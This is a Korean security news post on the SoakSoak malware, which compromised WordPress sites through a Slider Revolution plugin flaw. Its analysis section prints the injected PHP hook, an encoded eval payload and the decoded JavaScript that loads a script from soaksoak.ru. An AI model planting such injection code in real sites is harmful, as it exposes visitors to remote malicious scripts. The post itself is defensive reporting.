[해외보안동향] 10만 워드프레스 홈페이지가 위험하다!

10만 워드프레스 홈페이지가 위험하다!

워드프레스(WordPress)는 php언어로 개발된 블로그 플랫폼으로, 전 세계 많은 사람들이 워드프레스를 이용하여 홈페이지를 만들고 사용하고 있습니다. 최근 몇 개월 동안 워드프레스에서 많은 취약점들이 보고되었는데, 이번에도 또 하나의 취약점이 발견되었습니다.

이번에 발견된 것은 슬라이더 레볼루션(Slider Revolution) 플러그인의 제로데이 취약점으로, 공격자는 해당 취약점을 이용하여 사이트에 악성코드 업로드를 시도합니다. 만약 공격이 성공하면 백도어를 심고, swfobject파일을 수정한 뒤 해당 페이지를 방문하는 사용자들을 soaksoak.ru 페이지로 리다이렉션 시키는 악성코드를 추가로 삽입합니다. 이미 100,000개가 넘는 워드프레스 홈페이지가 해당 악성코드에 감염된 것으로 확인되었고, 그 수가 빠르게 증가하고 있습니다.

Google이 11,000개의 도메인 차단

Google은 이미 11,000개가 넘는 홈페이지를 차단했습니다. 이는 모두 SoakSoak 악성코드에 감염된 홈페이지입니다. 현재까지 온라인상에는약 7천만개가 넘는 홈페이지가 워드프레스로 제작되었습니다. 그렇기 때문에 해당 악성코드의 영향은 더욱 커질 것으로 예상됩니다.

해당 악성코드는 SoakSoak.ru 도메인을 가진 홈페이지에서 유포되고 있어, SoakSoak악성코드라고 명명되었습니다.

SoakSoak 악성코드 분석

SoakSoak 악성코드는 워드프레스의 wp-includes/template-loader.php문서를 수정합니다.

<?php

function FuncQueueObject()

{

  wp_enqueue_script("swfobject");

}

add_action("wp_enqueue_scripts",'FuncQueueObject');

Wp-includes/js/swobject.js문서를 매 페이지마다 업로드 시켜놓으며, swobject.js문서에는 암호화된 악성 js코드가 포함되어 있습니다.

eval(decodeURIComponent 

("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

※ 복호화 후 코드

eval(decodeURIComponent('(

function()

{

    //var ua = navigator.userAgent.toLowerCase();

    //if (ua.indexOf('chrome') != -1) return;

    var head=document.getElementsByTagName('head')[0];

    var script=document.createElement('script');

    script.type='text/javascript';

    script.src='http://soaksoak.ru/xteas/code';

    script.id='xxyyzz_petushok';

    head.appendChild(script);

}()

);'));

악성코드가 일단 복호화되면, SoakSoak.ru페이지(hxxp://soaksoak.ru/xteas/code)에서 js파일을 내려받습니다. 현재 해당 사이트는 접속이 되지 않습니다.

 

지금까지 워드프레스 4.1.4까지의 전 버전의 플러그인이 모두 해당 취약점에 위험한 것으로 확인되었습니다.

SoakSoak 악성코드 감염 검증 및 예방

현재까지 해당 악성코드가 어떠한 방식으로 홈페이지를 감염시키는지는 확인되지 않았습니다. 만약 워드프레스를 사용하고 있고, 자신의 페이지가 악성코드 감염여부가 궁금하다면 무료 스캔 툴 (http://sitecheck.sucuri.net/) 을 이용하면 됩니다.

출처 :

http://blog.sucuri.net/2014/12/soaksoak-malware-compromises-100000-wordpress-websites.html

http://www.hotforsecurity.com/blog/new-russian-malware-impacts-100000-wordpress-sites-11016.html

http://threatpost.com/google-blacklists-wordpress-sites-peddling-soaksoak-malware/109884